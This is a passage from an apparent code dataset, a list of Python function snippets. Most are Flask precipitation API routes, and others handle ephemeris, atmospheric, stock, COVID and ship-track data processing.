session.query(Measurement.date).order_by(Measurement.date.desc()).first() \n query_date = query_date[0]\n query_date = dt.datetime.strptime(query_date,'%Y-%m-%d').date()\n start_date_datetime = query_date - dt.timedelta(days=365)\n results= session.query(Measurement.date, Measurement.prcp).\\\n filter (Measurement.date >= start_date_datetime).all()\n prcp= {date:prcp for date,prcp in results}\n return jsonify (prcp)", "def precipitation():\n # Query \n results = session.query(Measurement.date, Measurement.prcp).all()\n \n dict = {}\n for result in results:\n dict[result.date] = result.prcp\n\n return jsonify(dict)", "def get_daily(Data, Y, M, D):\n start = datetime(year=Y, month=M, day=D, hour=0, minute=0)\n end = datetime(year=Y, month=M, day=D, hour=23, minute=59, second=59)\n return Data[start:end][\"clouds\"].map(value_by_cloud)", "def collect_data_date(self, date=None):\n if date is None:\n date = self.date\n # TODO make it so it doenst re-collect all data and just adds historical's data\n self.collect_all_stock_data()", "def precipitation():\n precip = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n\n # Create a dictionary from the row data and append to a list \n precip_dict = {}\n for date, prcp in precip:\n if prcp !=None:\n precip_dict.setdefault(date, []).append(prcp)\n\n return jsonify(precip_dict)", "def calculate_cdf(self):\n df_cdf = self.get_cdf_data()\n return ECDF(df_cdf['minute'])", "def get_daily_data():\n class C:\n pass\n\n def get_ticker(ticker):\n vals = []\n\n datafile = cbook.get_sample_data('%s.csv' % ticker, asfileobj=False)\n\n lines = open(datafile).readlines()\n for line in lines[1:]:\n vals.append([float(val) for val in line.split(',')[1:]])\n\n M = array(vals)\n c = C()\n c.open = M[:, 0]\n c.high = M[:, 1]\n c.low = M[:, 2]\n c.close = M[:, 3]\n c.volume = M[:, 4]\n return c\n c1 = get_ticker('intc')\n c2 = get_ticker('msft')\n return c1, c2", "def precipitation():\n\n precip_results = session.query(Measurements.date, Measurements.prcp).filter(Measurements.date >= '2016-08-23').\\\n group_by(Measurements.date).\\\n order_by(Measurements.date.desc()).all()\n\n # Create a dictionary from the row data and append to a list of all_passengers\n precip_data = []\n for row in precip_results:\n precip_dict = {}\n precip_dict[\"date\"] = row.date\n precip_dict[\"precip\"] = row.prcp\n precip_data.append(precip_dict)\n\n return jsonify(precip_data)", "def _construct_all_positions(self):\n d = dict((s, 0) for s in self.symbol_list)\n d['datetime'] = self.backtest_date\n return [d]", "def ProvideEphemerisData(self):\n return _gmat_py.EphemManager_ProvideEphemerisData(self)", "def __calc_CoagS(self):\n\n Dp_small = self.dp_lim[0]*1e-9 # in m\n temp = self.temp_data # Kelvin\n pres = self.pres_data # Pascal\n Dp = self.par_diam*1e-9 # m\n time = self.par_time # days\n N = self.__dNdlog2dN(Dp,self.smoothed_par_data) # cm-3\n findex = np.argwhere(Dp>=Dp_small).flatten()\n big_R = Dp[findex]/2.\n big_N = N[:,findex]\n k_B = 1.38064852e-23 # Boltzmann constant m2 kg s-2 K-1\n r0=Dp_small/2.\n r1=r0\n dens=1000.\n self.CoagS=np.zeros(time.shape)\n for i in range(0,len(time)):\n lamda=(6.73e-8*temp[i]*(1+(110.4/temp[i])))/(296*pres[i]/101325.0*1.373)\n myy=(1.832e-5*(temp[i]**(1.5))*406.4)/(5093*(temp[i]+110.4))\n kn1=lamda/r1\n kn=lamda/big_R\n CC= 1.+(kn*(1.142+(0.558*np.exp((-.999)/kn))))\n CC1= 1. + (kn1*(1.142+(0.558*np.exp((-.999)/kn1))))\n D = (k_B*temp[i]*CC)/(6.*np.pi*myy*big_R)\n D1 = (k_B*temp[i]*CC1)/(6.*np.pi*myy*r1)\n M = 4./3.*np.pi*(big_R**3)*dens\n M1 = 4./3.*np.pi*(r1**3)*dens\n c= np.sqrt((8.*k_B*temp[i])/(np.pi*M))\n c1= np.sqrt((8.*k_B*temp[i])/(np.pi*M1))\n c12= np.sqrt((c**2)+(c1**2))\n r12= big_R+r1\n D12= D+D1\n CCONT = 4.*np.pi*r12*D12\n CFR = np.pi*r12*r12*c12\n L=(8.*D)/(np.pi*c)\n L1=(8.*D1)/(np.pi*c1)\n SIG=(1./(3.*r12*L))*((r12+L)**3-(r12*r12+L*L)**1.5)-r12\n SIG1=(1./(3.*r12*L1))*((r12+L1)**3-(r12*r12+L1*L1)**1.5)-r12\n SIG12= np.sqrt((SIG**2)+(SIG1**2))\n KO=CCONT/((r12/(r12+SIG12))+(CCONT/CFR))\n self.CoagS[i] = np.nansum(KO*big_N[i,:]*1e6)\n if (r0==big_R[0]):\n self.CoagS[i] = 0.5*KO*big_N[i,0]*1e6+np.nansum(KO*big_N[i,1:]*1e6)\n else:\n self.CoagS[i] = np.nansum(KO*big_N[i,:]*1e6)", "def pick_data(eop_data, time, window):\n if time.isscalar:\n start_time = np.floor(time.utc.mjd) - window // 2\n end_time = np.ceil(time.utc.mjd) + window // 2\n else:\n start_time = np.floor(time.min().utc.mjd) - window // 2\n end_time = np.ceil(time.max().utc.mjd) + window // 2\n\n try:\n return {d: eop_data[d].copy() for d in np.arange(start_time, end_time + 1)}\n except KeyError:\n paths = [str(files.path(k)) for k in _EOP_FILE_KEYS]\n raise MissingDataError(\n \"Not all days in the time period {:.0f} - {:.0f} MJD were found in EOP-files {}\"\n \"\".format(start_time, end_time, \", \".join(paths))\n )", "def _interpolate_meteorological_data(dset, data, rundate):\n rundate = datetime(rundate.year, rundate.month, rundate.day)\n for field, station in [(f, f[4:]) for f in data.keys() if f.startswith(\"met_\")]:\n log.debug(f\"Meteorological data available for station {station}\")\n\n met_time = data[field].pop(\"met_time\")\n flat_list = [item for sublist in met_time for item in sublist]\n met_time_float = np.array([(flat_list[i] - rundate).total_seconds() for i in range(0, len(flat_list))])\n met_time_unique, met_index = np.unique(met_time_float, return_index=True)\n\n diff = len(met_time_float) - len(met_time_unique)\n if diff > 0:\n log.dev(f\"Removed duplicate met data for station {station}\")\n log.dev(\"Do this for the actual obs data also!\")\n if len(met_time_unique) == 1:\n for met_type in data[field].keys():\n data[field][met_type] = np.repeat(data[field][met_type][0], dset.num_obs)\n continue\n\n # Extrapolation one month before/after\n # (this is overkill, most of these values will be removed later when taking the diagonal)\n min_time = min(met_time_unique) - 31 * 86400\n max_time = max(met_time_unique) + 31 * 86400\n met_time_unique = np.hstack((np.array(min_time), met_time_unique, np.array(max_time)))\n\n for met_type in data[field].keys():\n met_data_array = data[field][met_type]\n flat_list = [item for sublist in met_data_array for item in sublist]\n met_data_array = np.array([flat_list[i] for i in met_index])\n met_data_array = np.hstack((met_data_array[0], met_data_array, met_data_array[-1]))\n data[field][met_type] = interpolation.interpolate(\n met_time_unique, met_data_array, dset.obs_time, kind=\"cubic\"\n )\n\n return data", "def prcp():\n \n #get max and year_past date from DB\n max_dt, yr_past = get_year_past()\n \n session = Session(engine)\n # Query all Measurement Table to get precipitation date for all available dates\n results = session.query(func.strftime('%Y-%m-%d',M.date), coalesce(M.prcp,0)).\\\n filter(M.date >= yr_past).order_by(M.date).all()\n \n session.close()\n \n # Convert list of tuples into dict with date as the key and precipitation as value\n prcp_dict = [{d:p} for d,p in results]\n \n return jsonify(prcp_dict)", "def daily_price():\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']", "def precipitation():\n\n # first select the latest date\n latest_date, new_date = get_latest_date()\n\n # select date and precip for last 12 months\n results = session.query(Measurement.date, Measurement.prcp). \\\n filter(Measurement.date >= new_date). \\\n order_by(Measurement.date).all()\n\n # convert results to dictionary\n prec_dict = {}\n\n for r in results:\n prec_dict[r.date] = r.prcp\n\n return jsonify(prec_dict)", "def precipitation():\n # Query all dates and precipitation levels from the last year \n precip_data = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= \"2016-08-23\").order_by(Measurement.date).all()\n # Convert list of tuples into normal list\n all_precip = list(np.ravel(precip_data))\n\n return jsonify(all_precip)", "def process(date, lat_oi, lon_oi, shared_args, verbose=False):\n \n filename = download(date, shared_args)\n\n atmo_data = data.open_netcdf4(filename)\n\n # choose points\n lat = atmo_data.variables['lat'][:]\n lon = atmo_data.variables['lon'][:]\n lat = numpy.stack([lat]*lon.shape[0], axis=0)\n lon = numpy.stack([lon]*lat.shape[1], axis=1)\n chosen_idxs, data_coor = funcs.choose_points(lat, lon, lat_oi, lon_oi)\n\n latidx = tuple(chosen_idxs[0])\n lonidx = tuple(chosen_idxs[1])\n \n t1, t2 = data.closest_hours(atmo_data.variables['time'][:].data,\n atmo_data.variables['time'].units, date)\n t1_dt = num2date(atmo_data.variables['time'][t1], atmo_data.variables['time'].units)\n t2_dt = num2date(atmo_data.variables['time'][t2], atmo_data.variables['time'].units)\n\n index1 = (t1, slice(None), latidx, lonidx)\n index2 = (t2, slice(None), latidx, lonidx)\n\n press = numpy.array(atmo_data.variables['lev'][:])\n\n temp1 = numpy.empty\n temp2 = numpy.empty\n \n temp1 = numpy.diagonal(atmo_data.variables['T'][index1], axis1=1, axis2=2).T\n temp2 = numpy.diagonal(atmo_data.variables['T'][index2], axis1=1, axis2=2).T\n\n rhum1 = numpy.diagonal(atmo_data.variables['RH'][index1], axis1=1, axis2=2).T # relative humidity\n rhum2 = numpy.diagonal(atmo_data.variables['RH'][index2], axis1=1, axis2=2).T\n\n height1 = numpy.diagonal(atmo_data.variables['H'][index1], axis1=1, axis2=2).T / 1000.0 # height\n height2 = numpy.diagonal(atmo_data.variables['H'][index2], axis1=1, axis2=2).T / 1000.0\n\n # interpolate in time, now they are shape (4, N)\n t = interp.interp_time(date, temp1, temp2, t1_dt, t2_dt)\n h = interp.interp_time(date, height1, height2, t1_dt, t2_dt)\n rh = interp.interp_time(date, rhum1, rhum2, t1_dt, t2_dt)\n \n # interpolate in space, now they are shape (1, N)\n height = interp.idw(h, data_coor, [lat_oi, lon_oi])\n temp = interp.idw(t, data_coor, [lat_oi, lon_oi])\n relhum = interp.idw(rh, data_coor, [lat_oi, lon_oi])\n \n # calculate the number of nan and zero values in the array and remove them, reducing the size of the array accordingly\n nr_of_nans1 = numpy.sum(temp1[0].mask)\n nr_of_nans2 = numpy.sum(temp2[0].mask)\n nr_of_nans = max([nr_of_nans1,nr_of_nans2])\n \n height = height[nr_of_nans:]\n temp = temp[nr_of_nans:]\n relhum = relhum[nr_of_nans:]\n press = press[nr_of_nans:]\n\n # load standard atmosphere for mid-lat summer\n # TODO evaluate standard atmo validity, add different ones for different TOY?\n stan_atmo = numpy.loadtxt(settings.STAN_ATMO, unpack=True)\n stan_height, stan_press, stan_temp, stan_relhum = stan_atmo\n # add standard atmo above cutoff index\n \n cutoff_idx = numpy.abs(stan_press - press[-1]).argmin()\n height = numpy.append(height, stan_height[cutoff_idx:])\n press = numpy.append(press, stan_press[cutoff_idx:])\n temp = numpy.append(temp, stan_temp[cutoff_idx:])\n relhum = numpy.append(relhum, stan_relhum[cutoff_idx:])\n \n # Convert relative humidity to percentage for modtran\n relhum = relhum * 100\n\n # TODO add buoy stuff to bottom of atmosphere\n\n if verbose:\n # send out plots and stuff\n stuff = numpy.asarray([height, press, temp, relhum]).T\n h = 'Height [km], Pressure[kPa], Temperature[k], Relative_Humidity[0-100]' + '\\nCoordinates: {0} Buoy:{1}'.format(data_coor, buoy)\n \n numpy.savetxt('atmosphere_{0}_{1}_{2}.txt'.format('merra', date.strftime('%Y%m%d'), buoy.id), stuff, fmt='%7.2f, %7.2f, %7.2f, %7.2f', header=h)\n\n return height, press, temp, relhum", "def precipitation():\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n last_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n rain = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date > last_year).\\\n order_by(Measurement.date).all()", "def precipitation():\r\n # Calculate the date 1 year ago from last date in database\r\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\r\n\r\n # Query for the date and precipitation for the last year\r\n precipitation = session.query(Measurement.date, Measurement.prcp).\\\r\n filter(Measurement.date >= prev_year).all()\r\n\r\n # Dict with date as the key and prcp as the value\r\n precip = {date: prcp for date, prcp in precipitation}\r\n return jsonify(precip)", "def to_stock_data_day(self, date):\n if type(date) is not datetime.datetime and type(date) is not pd.tslib.Timestamp:\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n\n dataframes = [i for i in dir(self) if not callable(getattr(self, i)) and not i.startswith(\"__\")\n and type(getattr(self, i)) is pd.DataFrame]\n dictionaries = [i for i in dir(self) if not callable(getattr(self, i)) and not i.startswith(\"__\")\n and type(getattr(self, i)) is dict]\n constant_values = [i for i in dir(self) if not callable(getattr(self, i)) and not i.startswith(\"__\")\n and getattr(self, i) is not None and i not in dataframes and i not in dictionaries]\n new_stock_data = StockData()\n\n for i in dataframes + dictionaries:\n setattr(new_stock_data, i, getattr(self, i)[date])\n\n for i in constant_values:\n setattr(new_stock_data, i, getattr(self, i))\n\n new_stock_data.dates = [date]\n new_stock_data.str_dates = [str(date)[:USEFUL_TIMESTAMP_CHARS]]\n\n return new_stock_data", "def _build_parsed_values(self):\n\n # \n # Generate a time data particle.\n # Note that raw_data already contains the individual fields\n # extracted and unpacked from the time data record.\n #\n particle = [\n {\n DataParticleKey.VALUE_ID: \n Vel3dKWfpStcTimeDataParticleKey.TIME_ON, \n DataParticleKey.VALUE: self.raw_data[INDEX_TIME_ON]\n },\n {\n DataParticleKey.VALUE_ID: \n Vel3dKWfpStcTimeDataParticleKey.TIME_OFF,\n DataParticleKey.VALUE: self.raw_data[INDEX_TIME_OFF]\n },\n {\n DataParticleKey.VALUE_ID: \n Vel3dKWfpStcTimeDataParticleKey.NUMBER_OF_RECORDS, \n DataParticleKey.VALUE: self.raw_data[INDEX_RECORDS]\n }\n ]\n\n return particle", "def _get_input_data(self, var, start_date, end_date):\n logging.info(self._print_verbose(\"Getting input data:\", var))\n # Pass numerical constants as is.\n if isinstance(var, (float, int)):\n return var\n # aospy.Var objects remain.\n # Pressure handled specially due to complications from sigma vs. p.\n elif var.name in ('p', 'dp'):\n data = self._get_pressure_vals(var, start_date, end_date)\n if self.dtype_in_vert == internal_names.ETA_STR:\n return self._to_desired_dates(data)\n return data\n # Get grid, time, etc. arrays directly from model object\n elif var.name in (internal_names.LAT_STR, internal_names.LON_STR,\n internal_names.TIME_STR, internal_names.PLEVEL_STR,\n internal_names.PK_STR, internal_names.BK_STR,\n internal_names.SFC_AREA_STR):\n data = getattr(self.model, var.name)\n else:\n cond_pfull = ((not hasattr(self, internal_names.PFULL_STR))\n and var.def_vert and\n self.dtype_in_vert == internal_names.ETA_STR)\n data = self.data_loader.load_variable(var, start_date, end_date,\n self.time_offset,\n **self.data_loader_attrs)\n name = data.name\n data = self._add_grid_attributes(data.to_dataset(name=data.name))\n data = data[name]\n if cond_pfull:\n try:\n self.pfull_coord = data[internal_names.PFULL_STR]\n except KeyError:\n pass\n # Force all data to be at full pressure levels, not half levels.\n bool_to_pfull = (self.dtype_in_vert == internal_names.ETA_STR and\n var.def_vert == internal_names.PHALF_STR)\n if bool_to_pfull:\n data = utils.vertcoord.to_pfull_from_phalf(data,\n self.pfull_coord)\n if var.def_time:\n # Restrict to the desired dates within each year.\n if self.dtype_in_time != 'av':\n return self._to_desired_dates(data)\n else:\n return data", "def get_equity_data(date=None):\n\n equity_info_list = []\n if date is None:\n equity_data_zip_file_url = __class__.get_href_for_latest_equity_data()\n else:\n equity_data_zip_file_url = __class__.get_zip_file_url_for_specific_date(date)\n\n url = urllib.request.urlopen(equity_data_zip_file_url)\n\n with ZipFile(BytesIO(url.read())) as my_zip_file:\n for contained_file in my_zip_file.namelist():\n with my_zip_file.open(contained_file) as csv_file:\n df = pd.read_csv(csv_file)\n for idx, row in df.iterrows():\n code = row['SC_CODE']\n name = row['SC_NAME'].strip().strip(\",.\")\n group = row['SC_GROUP'].strip().strip(\",.\")\n type_abbr = row['SC_TYPE'].strip().strip(\",.\")\n open = row['OPEN']\n high = row['HIGH']\n low = row['LOW']\n close = row['CLOSE']\n last = row['LAST']\n prev_close = row['PREVCLOSE']\n no_of_trades = row['NO_TRADES']\n no_of_shares = row['NO_OF_SHRS']\n net_turnov = row['NET_TURNOV']\n\n equity_info = EquityInfo(code, name, group, type_abbr, open, high, low, close, last,\n prev_close, no_of_trades, no_of_shares, net_turnov)\n equity_info_list.append(equity_info)\n\n return equity_info_list", "def createDates(self, data: QDate=None):\n if data is None:\n data = self.oggi\n # print('CREATEDATES DATA', data)\n dateList = MeseGiorniDictGen.bigList(data)\n return dateList", "def ProvideEphemerisData(self):\n return _gmat_py.Spacecraft_ProvideEphemerisData(self)", "def solve(self,n_days = 100,init_state = None,start_date = None,d = 1):\n\n # If init state is not given we use I0\n if init_state is None:\n assert self.start_state is not None\n init_state = int(self.I0)\n\n # Transform init_state into state object\n init_state = self.make_state(init_state)\n\n # Safety checks\n tol = 2\n assert hasattr(self,\"compartments\")\n assert len(init_state) == len(self.compartments)\n # assert hasattr(self,\"N\")\n # assert np.abs(init_state.sum() - self.N) < tol,f\"Init state {init_state.values} does not sum to total population {self.N}\"\n assert n_days > self.offset\n \n # Grid of time points (in days)\n # Take offset into account\n offset = self.offset\n t = np.linspace(0, n_days - offset, (n_days - offset +1)*d)\n\n # Integrate the model equations over the time grid, t.\n states = odeint(self.derivative, init_state, t)\n\n # Converts to DataFrame and then to custom object\n states = pd.DataFrame(states,columns = self.compartments)\n if d > 1: \n states.index = states.index / d\n\n # Add offset into account\n if offset > 0:\n states.index = range(offset,n_days + 1)\n states = states.reindex(range(0,n_days + 1))\n states = states.fillna(method = \"bfill\")\n elif offset < 0:\n states.index = [x + offset for x in states.index]\n\n # Convert to custom object\n states = CompartmentStates(states)\n states.build_aggregates(self.states)\n\n # If start date is given, convert to dates\n if self.start_date is not None:\n start_date = self.start_date\n if start_date is not None:\n index = pd.to_datetime(start_date) + pd.TimedeltaIndex(states.index,unit = \"D\")\n states.index = index\n \n return states", "def get_result_ephemeris(self, run_number, force_update=False) -> pd.DataFrame:\n\n ephemeris_text = self.get_result_raw_ephemeris(run_number, force_update)\n ephemeris = stk.io.ephemeris_file_data_to_dataframe(ephemeris_text.splitlines())\n return ephemeris", "def _get_all_data(self, start_date, end_date):\n return [self._prep_data(self._get_input_data(var, start_date,\n end_date),\n self.var.func_input_dtype)\n for n, var in enumerate(self.variables)]", "def precipitation():\n # Create our session (link) from Python to the DB\n \n session = Session(engine)\n\n \"\"\"Return a list of all precipiation values for the last 12 months\"\"\"\n # Example # results = session.query(Passenger.name).all()\n\n\n results = session.query(Measurement.date, func.avg(Measurement.prcp)).\\\n filter(Measurement.date > '2016-08-23').\\\n group_by(Measurement.date).\\\n order_by(Measurement.date).all()\n\n # Close session\n\n session.close()\n\n prcp = []\n \n for date, average in results:\n prcp_dict = {}\n prcp_dict['Date'] = date\n prcp_dict['Avg. Precipitation'] = average\n prcp.append(prcp_dict)\n \n # jsonify the results\n return jsonify(prcp)\n\n # Convert list of tuples into normal list\n # Example # all_names = list(np.ravel(results))", "def __init__(self, year=None, month=None, day=None, map_type='Cases'):\n self.covid_df = pd.DataFrame([])\n self.geo_data = pd.DataFrame([])\n self.name_iso2_mapping = {}\n self.countries_centroids = pd.DataFrame([])\n \n try:\n self.date = datetime(year=year, month=month, day=day)\n except:\n print('Invalid/empty date entry (year, month, day take valid int inputs)! Date defaulted to today.')\n self.date = datetime.today()\n \n if self.date > datetime.today():\n print('Can\\'t input future date! Date defaulted to today.')\n self.date = datetime.today()\n \n if map_type not in ['Cases', 'Deaths']:\n sys.exit('Please specify either \"Cases\" or \"Deaths\" as map type!')\n else:\n self.map_type = map_type", "def precipitation():\n # Calculate the date 1 year ago from the last data point in the database\n #Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Use query from notebook. Get the last date in database, then calc a year before \n last_date = session.query(func.max(Measurement.date)).first() \n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # filter to one year ago \n twelve_months_precip = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= year_ago).all()\n\n session.close()\n\n # create a list for results to jsonify \n\n list_data = []\n for months in twelve_months_precip:\n data = {}\n data[\"date\"] = months[0]\n data[\"prcp\"] = months[1]\n list_data.append(data)\n\n # jsonify the results \n\n return jsonify(list_data)", "def precipitation():\n # Calculate teh date 1 year ago from last date in database\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query for the date and precipitation for the last year\n precipitation = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= prev_year).all()\n \n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)", "def get_data(self, gauge_name, date_key):\n pass", "def load_covid_cases_data_all():\n covid_data = dict()\n date = datetime.strptime('03-23-2020', '%m-%d-%Y') # first date johns hopkins included county data\n today = datetime.today()\n while date <= today:\n covid_data[date.strftime('%m-%d-%Y')] = load_covid_cases_data(date)\n date = date + timedelta(days=1)\n return covid_data", "def analyse_course(position_df):\n\n print(\"Analysing course of track\")\n total_data_points = len(position_df)\n\n earliest_date_time = position_df['date_time'].min()\n current_date = earliest_date_time\n\n previous_position = get_location(earliest_date_time, position_df)\n datetime_previous, latitude_previous, longitude_previous = previous_position\n\n previous_speed_knots = 0\n\n count_acceleration_errors = 0\n\n line_number = -1\n for position in position_df.itertuples():\n line_number += 1\n row_index = position[0]\n\n if line_number == 0:\n #position_df.at[row_index, 'measureland_qualifier_flag_course'] = 1 # assume good value\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 1 # assume good value\n continue\n\n current_position = position[2:5]\n\n # Calculate acceleration between two points\n current_conditions = knots_two_points(previous_position, current_position)\n current_speed_knots = current_conditions[1] # altered to this because distance and speed are output as a tuple from knots_two_points\n\n time_difference = (current_position[0] - previous_position[0]).total_seconds()\n\n speed_difference_metres_per_sec = (current_speed_knots - previous_speed_knots) * (1852 / 3600) # convert knots to ms-1\n if time_difference > 0:\n acceleration = speed_difference_metres_per_sec / time_difference\n else:\n acceleration = 0\n\n # Print errors where data do not meet requirements\n error_message_acceleration = \"\"\n\n if acceleration == \"N/A\":\n error_message_acceleration = \"No acceleration value calculated\"\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 9 # no value\n elif acceleration > 1:\n count_acceleration_errors += 1\n error_message_acceleration = \"** Acceleration too quick **\"\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 3 # probably bad value\n elif acceleration <= 1:\n position_df.at[row_index, 'measureland_qualifier_flag_acceleration'] = 1 # good value\n\n # if error_message_acceleration != \"\":\n # print(\"Error: {} {} ({:.4f}, {:.4f}) acceleration: {} ms-2\".format(error_message_acceleration,\n # current_position[0],\n # current_position[1],\n # current_position[2], acceleration))\n\n previous_position = current_position\n #previous_bearing = current_bearing\n previous_speed_knots = current_speed_knots\n\n #position_df['measureland_qualifier_flag_course'] = position_df['measureland_qualifier_flag_course'].astype(int)\n position_df['measureland_qualifier_flag_acceleration'] = position_df['measureland_qualifier_flag_acceleration'].astype(int)\n\n return (count_acceleration_errors)", "def _calc_solar_and_precip(netcdf_start_date, netcdf_end_date, dest_dir, tmp_dir):\n hrs_range = arrow.Arrow.range(\n \"hour\", netcdf_start_date, netcdf_end_date.shift(hours=+23)\n )\n for netcdf_hr in hrs_range:\n prev_hr = netcdf_hr.shift(hours=-1)\n prev_nemo_date = f\"y{prev_hr.year}m{prev_hr.month:02d}d{prev_hr.day:02d}\"\n prev_nemo_hr_ds_path = (\n tmp_dir / f\"gemlam_{prev_nemo_date}_{prev_hr.hour:03d}.nc\"\n )\n nemo_date = f\"y{netcdf_hr.year}m{netcdf_hr.month:02d}d{netcdf_hr.day:02d}\"\n nemo_hr_ds_path = tmp_dir / f\"gemlam_{nemo_date}_{netcdf_hr.hour:03d}.nc\"\n nemo_hr_ds_dest = dest_dir / nemo_hr_ds_path.name\n shutil.copy2(nemo_hr_ds_path, nemo_hr_ds_dest)\n bash_cmd = (\n f\"avg-diff-hrs {prev_nemo_hr_ds_path} {nemo_hr_ds_path} {nemo_hr_ds_dest}\"\n )\n _exec_bash_func(bash_cmd)", "def RecordEphemerisData(self):\n return _gmat_py.EphemManager_RecordEphemerisData(self)", "def getFX(date, targetCurrency):\n\treturn \\\n\tcompose(\n\t\tpartial(mergeDict, {targetCurrency: 1.0})\n\t , dict\n\t , partial(map, lambda p: (p['Currency'], p['FX']))\n\t , partial( filter\n\t \t\t , lambda p: toDateString(p['Date']) == date and p['Reporting Currency'] == targetCurrency\n\t \t\t )\n\t , getRawPositionsFromFile\n\t , partial(join, getDataDirectory())\n\t)('FX.xlsx')", "def _series_date_value_iter(data_points: List[dict]) -> Generator:\n for data_point in data_points:\n yield data_point[\"generic:ObsDimension\"][\"@value\"], data_point[\"generic:ObsValue\"][\"@value\"]", "def compute_obs():\n sql = \"\"\"\nSELECT\n s.id, ST_x(s.geom) as lon, ST_y(s.geom) as lat,\n sum(CASE WHEN\n day = 'TODAY'::date and pday > 0\n THEN pday ELSE 0 END) as p01,\n sum(CASE WHEN\n day IN ('TODAY'::date,'YESTERDAY'::date) and pday > 0\n THEN pday ELSE 0 END) as p02,\n sum(CASE WHEN\n pday > 0\n THEN pday ELSE 0 END) as p03\nFROM\n summary_%s c, stations s\nWHERE\n s.network in ('IA_ASOS', 'AWOS') and\n s.iemid = c.iemid and\n day IN ('TODAY'::date,'YESTERDAY'::date, 'TODAY'::date - '2 days'::interval)\nGROUP by s.id, lon, lat\n \"\"\" % (datetime.date.today().year,)\n icursor.execute(sql)\n data = {}\n for row in icursor:\n data[row['id']] = row\n return data", "def precipitation():\n \n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \n # Query all precipitation data from the last year\n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= str(year_ago)).\\\n order_by(Measurement.date).all()\n \n session.close()\n\n # Convert list of tuples into dictionary\n result_dict={}\n for row in results:\n result_dict.update({row[0] : row[1]})\n\n return jsonify(result_dict)", "def _build_parsed_values(self):\n # need to exclude sci times\n return self._parsed_values(GpsPositionDataParticle.keys_exclude_all_times)", "def cubicspline(df):\r\n listDI = [ [n,y(df,n)] for n in range(1,max(df['Vertices']))]\r\n df_spline = pd.DataFrame(listDI, columns = ['Days', 'DIxPRE 252'])\r\n return df_spline", "def precipitation():\n \n precipit = (session.query(Measurement.date, Measurement.prcp, Measurement.station).filter(Measurement.date > prevyeardates).order_by(Measurement.date).all()) \n\n session.close()\n\n PrecipitData=[]\n\n for data in precipit:\n PrecipitDict={data.date: data.prcp, \"Station\": data.station}\n PrecipitData.append(PrecipitDict)\n\n return jsonify(PrecipitData)", "def fetchEquityDataForSingleDay(on_date, useCache=False):\n return fetchEquityData(on_date, on_date, useCache)", "def Extract_data_for_plotting(COVID_data, X_Axis_inc, Y_Axis_inc, Z_Axis_inc, Date_start, Date_end, Keep_no_PR = True):\r\n Date_start_obj = datetime.strptime(Date_start, '%Y-%m-%d') # Create a list of all the dates to extract\r\n Date_end_obj = datetime.strptime(Date_end, '%Y-%m-%d')\r\n Date_difference = (Date_end_obj - Date_start_obj).days + 1\r\n \r\n Date_list = [(Date_start_obj + timedelta(Days)).isoformat()[:10] for Days in range(Date_difference)]\r\n \r\n Countries_list = list(COVID_data.keys())[1:]\r\n\r\n COVID_data_scatter = {'0Date': {'Country': [COVID_data['_Country']['Date'][Axis_inc] for Axis_inc in [X_Axis_inc, Y_Axis_inc, Z_Axis_inc]]}}\r\n \r\n for Date in Date_list: # For each date and each country...\r\n COVID_data_scatter[Date] = {}\r\n for Country in Countries_list:\r\n try:\r\n Data_items = [COVID_data[Country][Date][Axis_inc] for Axis_inc in [X_Axis_inc, Y_Axis_inc, Z_Axis_inc]] # This line will prompt an error in case the data doesn't exist, hence the try - except structure (much easier than 10 000 conditions to try to figure out if the data exists for a date and country)\r\n \r\n if None not in Data_items[:2] and not (not Keep_no_PR and Data_items[2] == None): # Any data point that has a None as its X or Y coordinate is exlcuded, and also Z if asked by the user\r\n if min(Data_items[:2]) > 0: COVID_data_scatter[Date][Country] = Data_items # Since the graph is in logscale, points with 0 as their X or Y coordinate are excluded (because log(0) doesn't exist).\r\n # This double verification can't be done in one line because having None in a list you're trying to find the minimum of prompts an error\r\n except: pass\r\n \r\n if COVID_data_scatter[Date] == {}: COVID_data_scatter.pop(Date)\r\n \r\n return COVID_data_scatter", "def _get_datas(self):\n print(f'base name {self.base_name}')\n data_file_name = glob(osp.join(self.root_dir, MERGED_PATTERN))[0]\n data_df = pd.read_csv(data_file_name)\n\n ppg_d = data_df[['CurrentTimeMillis', 'ch1']].values\n acc_d = data_df[[\n 'EventTimestamp(ns)', 'accel_x', 'accel_y', 'accel_z'\n ]].values\n ppg_d = ppg_d[::2]\n acc_d = acc_d[::2]\n\n return acc_d, ppg_d", "def _obtain_data(self):\n (self.data_df, self.column_df, self.station_name, self.log_file, self.station_lat, self.station_lon,\n self.station_elev, self.ws_anemometer_height, self.missing_fill_value, self.script_mode,\n self.auto_mode, self.fill_mode, self.metadata_mode, self.generate_bokeh, self.metadata_df,\n metadata_series) = input_functions.obtain_data(self.config_path, self.metadata_path)\n\n if self.script_mode == 1: # correcting data\n self.mc_iterations = 1000 # Number of iters for MC simulation of thornton running solar radiation gen\n else:\n self.mc_iterations = 50 # if we're not correcting data then only do a few iterations to save time\n\n print(\"\\nSystem: Raw data successfully extracted from station file.\")\n\n # Extract individual variables from data frame back into to numpy arrays.\n self.data_year = np.array(self.data_df.year)\n self.data_month = np.array(self.data_df.month)\n self.data_day = np.array(self.data_df.day)\n self.data_tavg = np.array(self.data_df.tavg)\n self.data_tmax = np.array(self.data_df.tmax)\n self.data_tmin = np.array(self.data_df.tmin)\n self.data_tdew = np.array(self.data_df.tdew)\n self.data_ea = np.array(self.data_df.ea)\n self.data_rhavg = 